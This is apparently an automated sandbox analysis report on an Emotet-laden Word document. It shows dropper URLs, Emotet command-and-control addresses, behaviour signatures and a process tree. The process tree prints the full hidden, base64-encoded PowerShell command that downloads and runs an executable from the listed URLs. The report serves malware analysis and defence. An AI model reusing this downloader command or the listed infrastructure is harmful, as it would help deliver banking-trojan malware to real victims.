Overview

overview

10

task1

 

10

task2

 

10

Analysis

  • max time kernel
    136s
  • resource
    win7v191014
  • submitted
    13-12-2019 20:59

Sharing

Copy URL
Twitter E-mail

General

  • Target

    Docs_7fd7b14acff688e84b811d03e1831552.63.doc

  • Sample

    191213-ptztv3vr3j

  • SHA256

    57fd6973ae1ee5bc249420f5bfae5737bc4c9cbbf0caac146194044d390f9efc

Score
10/10
trojanbankeremotet

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://kaikeline.com/1B/
exe.dropper

http://irpot.com/css/jRk5gg/
exe.dropper

http://kartcup.net/picture_library/eqop/
exe.dropper

http://lakelass.com/cgi-bin/2dhm/
exe.dropper

http://ouimet.biz/cgi-bin/l/

Extracted

Family

emotet

C2

73.214.99.25:80

179.13.185.19:80

186.67.208.78:8080

37.59.24.177:8080

66.34.201.20:7080

108.179.206.219:8080

45.56.88.91:443

218.44.21.114:80

75.80.148.244:80

31.31.77.83:443

212.129.24.79:8080

12.229.155.122:80

91.73.197.90:80

206.81.10.215:8080

128.65.154.183:443

108.191.2.72:80

144.139.247.220:80

181.57.193.14:80

169.239.182.217:8080

2.38.99.79:80
rsa_pubkey.plain

Signatures

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs
  • Executes dropped EXE 4 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious behavior: EmotetMutantsSpam 2 IoCs
  • Drops file in System32 directory 6 IoCs
  • Modifies registry class 136 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

    trojanbankeremotet

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_7fd7b14acff688e84b811d03e1831552.63.doc"
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of FindShellTrayWindow
    • Drops file in System32 directory
    PID:1084
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABKAGQAZwB5AHQAbABnAHEAbgB0AHUAPQAnAFcAaABiAGsAYwB6AGEAaQBxAHIAZwBuACcAOwAkAE8AYwB3AHkAcAB5AGQAeABtAGoAagBnAGUAIAA9ACAAJwAxADYAJwA7ACQAWQBrAG4AdABkAGoAbwBpAHQAcAA9ACcASABsAGoAZQB2AGcAaQBhAGYAaAAnADsAJABUAHUAeQBjAHgAeABsAHoAbgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQATwBjAHcAeQBwAHkAZAB4AG0AagBqAGcAZQArACcALgBlAHgAZQAnADsAJABGAHkAZgBzAG0AegBsAHQAPQAnAFMAZABmAGEAbwBsAGkAeQBpAHYAbgBuACcAOwAkAFUAYgBkAGwAaQB0AHcAcwBnAGwAaABzAGMAPQAuACgAJwBuACcAKwAnAGUAdwAtAG8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAG4AZQB0AC4AdwBlAGIAYwBMAGkARQBOAHQAOwAkAFgAcwBjAGsAeAB5AGcAegBoAG4AcwB1AHMAPQAnAGgAdAB0AHAAOgAvAC8AawBhAGkAawBlAGwAaQBuAGUALgBjAG8AbQAvADEAQgAvACoAaAB0AHQAcAA6AC8ALwBpAHIAcABvAHQALgBjAG8AbQAvAGMAcwBzAC8AagBSAGsANQBnAGcALwAqAGgAdAB0AHAAOgAvAC8AawBhAHIAdABjAHUAcAAuAG4AZQB0AC8AcABpAGMAdAB1AHIAZQBfAGwAaQBiAHIAYQByAHkALwBlAHEAbwBwAC8AKgBoAHQAdABwADoALwAvAGwAYQBrAGUAbABhAHMAcwAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvADIAZABoAG0ALwAqAGgAdAB0AHAAOgAvAC8AbwB1AGkAbQBlAHQALgBiAGkAegAvAGMAZwBpAC0AYgBpAG4ALwBsAC8AJwAuACIAUwBgAFAATABpAFQAIgAoACcAKgAnACkAOwAkAEgAbQBrAGcAcgBvAGgAcQBsAGoAbwBmAGUAPQAnAFUAZAB2AHAAbgB0AGcAegB1AHIAeAByAGcAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEIAeQBsAHgAcABrAG4AcAB3AGwAZQBtACAAaQBuACAAJABYAHMAYwBrAHgAeQBnAHoAaABuAHMAdQBzACkAewB0AHIAeQB7ACQAVQBiAGQAbABpAHQAdwBzAGcAbABoAHMAYwAuACIARABgAG8AYAB3AE4ATABvAEEAZABGAGAASQBMAGUAIgAoACQAQgB5AGwAeABwAGsAbgBwAHcAbABlAG0ALAAgACQAVAB1AHkAYwB4AHgAbAB6AG4AKQA7ACQAUQByAGUAaABsAGEAbwBlAD0AJwBNAGIAcgB3AG0AagBnAG4AYwAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAFQAdQB5AGMAeAB4AGwAegBuACkALgAiAGwARQBuAGAAZwBgAFQASAAiACAALQBnAGUAIAAzADAANwA4ADMAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwB0AGEAYABSAFQAIgAoACQAVAB1AHkAYwB4AHgAbAB6AG4AKQA7ACQAWQBnAGQAYQBtAHEAbwB1AHcAYQBxAGkAPQAnAEEAdwBqAHcAZgB6AHQAZwBhAHIAcABjAGgAJwA7AGIAcgBlAGEAawA7ACQARABlAGwAbAB5AHQAeABlAGsAbgB5AD0AJwBMAG0AawBpAGMAcQBpAGoAZQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABTAHkAcgBnAG0AbABrAGkAZwBkAD0AJwBGAHgAdgBjAGMAcwB5AGoAZwBqAGwAdgBvACcA
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    • Drops file in System32 directory
    PID:1996
    • C:\Users\Admin\16.exe
      "C:\Users\Admin\16.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      • Executes dropped EXE
      PID:2072
      • C:\Users\Admin\16.exe
        --9b97a9af
        3⤵
        • Suspicious use of SetWindowsHookEx
        • Executes dropped EXE
        • Suspicious behavior: EmotetMutantsSpam
        • Drops file in System32 directory
        PID:2096
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "-2116313526-128243546112969753881292014644-38543870820470481086982838491633180130"
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:2004
  • C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k WerSvcGroup
    1⤵
      PID:1856
    • C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
      "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
      1⤵
        PID:1820
      • C:\Windows\SysWOW64\iplkmaker.exe
        "C:\Windows\SysWOW64\iplkmaker.exe"
        1⤵
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        • Executes dropped EXE
        PID:2164
        • C:\Windows\SysWOW64\iplkmaker.exe
          --e21a3d74
          2⤵
          • Suspicious use of SetWindowsHookEx
          • Suspicious behavior: EnumeratesProcesses
          • Executes dropped EXE
          • Suspicious behavior: EmotetMutantsSpam
          • Drops file in System32 directory
          PID:2180

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/1084-4-0x000000000621D000-0x0000000006243000-memory.dmp

        Filesize

        152KB

        Download

      • memory/1084-5-0x0000000006243000-0x0000000006247000-memory.dmp

        Filesize

        16KB

        Download

      • memory/1084-0-0x0000000006020000-0x0000000006024000-memory.dmp

        Filesize

        16KB

        Download

      • memory/1084-3-0x0000000008ED0000-0x0000000008ED4000-memory.dmp

        Filesize

        16KB

        Download

      • memory/1084-2-0x000000000621D000-0x0000000006243000-memory.dmp

        Filesize

        152KB

        Download

      • memory/1084-1-0x00000000062EF000-0x00000000062F1000-memory.dmp

        Filesize

        8KB

        Download

      • memory/2072-8-0x0000000000270000-0x0000000000287000-memory.dmp

        Filesize

        92KB

        Download

      • memory/2096-10-0x0000000000300000-0x0000000000317000-memory.dmp

        Filesize

        92KB

        Download

      • memory/2096-11-0x0000000000400000-0x0000000000483000-memory.dmp

        Filesize

        524KB

        Download

      • memory/2164-13-0x0000000000620000-0x0000000000637000-memory.dmp

        Filesize

        92KB

        Download

      • memory/2180-15-0x00000000001F0000-0x0000000000207000-memory.dmp

        Filesize

        92KB

        Download

      • memory/2180-16-0x0000000000400000-0x0000000000483000-memory.dmp

        Filesize

        524KB

        Download